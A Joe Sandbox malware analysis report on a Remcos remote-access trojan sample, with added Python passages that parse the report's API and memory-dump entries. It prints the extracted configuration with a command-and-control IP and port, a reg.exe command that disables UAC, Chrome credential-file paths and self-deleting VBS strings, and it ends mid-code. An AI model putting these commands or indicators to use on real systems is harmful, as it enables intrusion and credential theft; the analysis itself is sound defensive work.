
Windows Analysis Report
6Ctc0o7vhqKgjU7.exe

Overview

General Information

Sample name: 6Ctc0o7vhqKgjU7.exe
Analysis ID: 1549119
MD5: 5f9342df635d0a624f0284fa5bbd8b54
SHA1: 15c64139cc8663711d5521d49e867de1906e0f88
SHA256: 63ac85fa66152f936244088e40eb124a6888336a4508f8d3d63d818ad30e4280
Tags: exe user-lowmal3

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Machine Learning detection for sample
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different from the original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • 6Ctc0o7vhqKgjU7.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe" MD5: 5F9342DF635D0A624F0284FA5BBD8B54)
    • 6Ctc0o7vhqKgjU7.exe (PID: 332 cmdline: "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe" MD5: 5F9342DF635D0A624F0284FA5BBD8B54)
    • 6Ctc0o7vhqKgjU7.exe (PID: 5932 cmdline: "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe" MD5: 5F9342DF635D0A624F0284FA5BBD8B54)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware configuration (Remcos):
{"Host:Port:Password": ["192.3.64.152:2559:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-35QZU7", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Yara matches in process memory dumps:

Source | Rule | Description | Author
00000003.00000002.4150350434.00000000011F0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000003.00000002.4150222621.0000000001198000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
Yara matches in unpacked PE files (matched strings listed under the row):

Source | Rule | Description | Author | Strings
3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown | see below
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown | see below
  • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6657c:$str_b2: Executing file:
  • 0x675fc:$str_b3: GetDirectListeningPort
  • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67128:$str_b7: \update.vbs
  • 0x665a4:$str_b9: Downloaded file:
  • 0x66590:$str_b10: Downloading file:
  • 0x66634:$str_b12: Failed to upload file:
  • 0x675c4:$str_b13: StartForward
  • 0x675e4:$str_b14: StopForward
  • 0x67080:$str_b15: fso.DeleteFile "
  • 0x67014:$str_b16: On Error Resume Next
  • 0x670b0:$str_b17: fso.DeleteFolder "
  • 0x66624:$str_b18: Uploaded file:
  • 0x665e4:$str_b19: Unable to delete:
  • 0x67048:$str_b20: while fso.FileExists("
  • 0x66ac1:$str_c0: [Firefox StoredLogins not found]

Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: CC 3E 58 54 18 FB 05 8D 90 F6 62 0C B7 F6 96 F6 C6 30 68 ED 10 53 B2 10 5E 06 8E 7A 31 B0 C9 D4 33 CB DC 9F B5 E6 9D E9 04 41 36 F1 4E 75 67 2F 9D 4C 2A 34 98 96 CE BC 34 9E 9E F7 40 97 C2 D9 9A 41 7A A2 82 F6 B2 44 FF C6 CE 2C EE 1C 73 66 7B B0 FE 9E 26 DB, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe, ProcessId: 5932, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-35QZU7\exepath

Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T11:00:22.102362+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.4 | 49737 | TCP
2024-11-05T11:01:00.945958+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.4 | 49758 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T11:00:08.654038+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 178.237.33.50 | 80 | TCP
2024-11-05T11:01:23.273775+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49891 | 178.237.33.50 | 80 | TCP


AV Detection

Source: 6Ctc0o7vhqKgjU7.exe | Avira: detected
Source: 00000003.00000002.4150222621.0000000001198000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["192.3.64.152:2559:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-35QZU7", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: 6Ctc0o7vhqKgjU7.exe | ReversingLabs: Detection: 34%
Source: Yara match | File source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4150350434.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4150222621.0000000001198000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 5932, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 6Ctc0o7vhqKgjU7.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,3_2_004338C8
Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_4328628b-8

Exploits

Source: Yara match | File source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 5932, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00407538 _wcslen,CoGetObject,3_2_00407538
Source: 6Ctc0o7vhqKgjU7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 6Ctc0o7vhqKgjU7.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_0040928E
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_0041C322
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,3_2_0040C388
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_004096A0
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,3_2_00408847
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00407877 FindFirstFileW,FindNextFileW,3_2_00407877
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040BB6B
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00419B86
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040BD72
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,3_2_00407CD2

                  Networking

                  barindex
                  Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49751 -> 192.3.64.152:2559
                  Source: Malware configuration extractor IPs: 192.3.64.152
                  Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
                  Source: Joe Sandbox View IP Address: 178.237.33.50
                  Source: Joe Sandbox View IP Address: 192.3.64.152
                  Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
                  Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49734 -> 178.237.33.50:80
                  Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49891 -> 178.237.33.50:80
                  Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49758
                  Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49737
                  Source: unknown TCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe Code function: 3_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_0041B411
                  Source: global traffic DNS traffic detected: DNS query: geoplugin.net
                  Source: 6Ctc0o7vhqKgjU7.exe, 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4150350434.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4150350434.000000000120A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4150350434.00000000011D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gppW#
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719025391.0000000005960000.00000004.00000020.00020000.00000000.sdmp, 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
                  Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe Code function: 3_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000 3_2_0040A2F3
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe Code function: 3_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,3_2_0040B749
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe Code function: 3_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004168FC
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,3_2_0040B749
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,3_2_0040A41B
                  Source: Yara matchFile source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 5932, type: MEMORYSTR
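The four "Code function" entries above are what the sandbox disassembled in process 3, the child that holds the unpacked Remcos image. The useful facts hide in the raw arguments: SetWindowsHookExA is called with idHook 0x0D, which is WH_KEYBOARD_LL, a low-level keyboard hook that needs no DLL injection, with the hook procedure at 0x0040A2DF inside the unpacked image and hMod 0; the GetKeyboardState/ToUnicodeEx sequence turns virtual-key codes into text for the foreground window's layout. The following Python is an added example, not part of the Joe Sandbox report and not Remcos code: it parses the four entries (copied inline as constructed input), decodes the hook arguments as the report prints them, maps idHook to the WH_* constants from WinUser.h, and tags clipboard and keystroke-translation capability per function. The line regex and the tag names are this example's own.

```python
import re

# Constructed input: the four "Code function" entries from the section above,
# reduced to "<func_id> <api list> [<hex args>]" exactly as the report prints them.
REPORT_LINES = [
    "3_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000",
    "3_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard",
    "3_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,"
    "SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,"
    "GlobalUnlock,CloseClipboard",
    "3_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,"
    "GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx",
]

# idHook values from WinUser.h. The _LL hooks run in the installing process,
# so no DLL has to be injected into the target.
HOOK_IDS = {2: "WH_KEYBOARD", 7: "WH_MOUSE", 13: "WH_KEYBOARD_LL", 14: "WH_MOUSE_LL"}

LINE_RE = re.compile(
    r"^(?P<func>\d+_\d+_[0-9A-Fa-f]{8})\s+(?P<apis>[\w,]+)(?:\s+(?P<args>[0-9A-Fa-f,]+))?$"
)


def parse_line(line):
    """Split one report entry into (function id, [API names], [hex argument strings])."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised entry: {line!r}")
    apis = m.group("apis").split(",")
    args = m.group("args").split(",") if m.group("args") else []
    return m.group("func"), apis, args


def decode_hook(args):
    """Decode SetWindowsHookEx(idHook, lpfn, hMod, ...) arguments printed as hex words."""
    id_hook = int(args[0], 16)
    return {
        "idHook": id_hook,
        "name": HOOK_IDS.get(id_hook, f"WH_UNKNOWN_{id_hook}"),
        "lpfn": int(args[1], 16),  # hook procedure address
        # hMod 0 means the hook procedure lives in the calling process itself
        "hMod": int(args[2], 16) if len(args) > 2 else None,
    }


def classify(lines):
    """Return {function id: sorted capability tags} for entries matching a known pattern."""
    tags = {}
    for line in lines:
        func, apis, args = parse_line(line)
        found = set()
        if any(a.startswith("SetWindowsHookEx") for a in apis) and args:
            hook = decode_hook(args)
            if hook["idHook"] in (2, 13):
                found.add("keyboard_hook:" + hook["name"])
            elif hook["idHook"] in (7, 14):
                found.add("mouse_hook:" + hook["name"])
        if "GetKeyboardState" in apis and "ToUnicodeEx" in apis:
            found.add("keystroke_translation")  # raw VK codes rendered as text
        if "GetClipboardData" in apis:
            found.add("clipboard_read")
        if "SetClipboardData" in apis:
            found.add("clipboard_write")
        if found:
            tags[func] = sorted(found)
    return tags


if __name__ == "__main__":
    for func, caps in classify(REPORT_LINES).items():
        print(func, ", ".join(caps))
```

The same decoder applies to any SetWindowsHookEx call the sandbox prints; an idHook of 2 or 13 is the keylogger case, and an lpfn that falls inside a dumped region (here 0x0040A2DF in the 0x400000 image of process 3) tells you which dump to disassemble.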

                  E-Banking Fraud

Source: Yara match | File source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4150350434.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4150222621.0000000001198000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 5932, type: MEMORYSTR
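The memory-dump identifiers in the Yara lists above carry the region attributes. The one that matters is 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp: in process 3 the region at 0x400000, where the executable's own image should be mapped, has protection 0x40 (PAGE_EXECUTE_READWRITE) and type 0x20000 (MEM_PRIVATE) instead of MEM_IMAGE, which is what a hollowed or manually mapped image looks like, and it is the region that matches both Remcos rules. The following Python is an added example, not part of the Joe Sandbox report: it decodes those identifiers with the Win32 constants from winnt.h and flags private writable+executable regions. The field layout (process index, dump index, dump id, base, protection, an unlabelled field, region type, an unlabelled field) is this example's reading of the names on this page, not documented here, and the 0x400000 image base is taken from the ".400000.0.unpack" dump name above.

```python
import re

# Constructed input: three identifiers copied from the Yara match lists above.
DUMP_IDS = [
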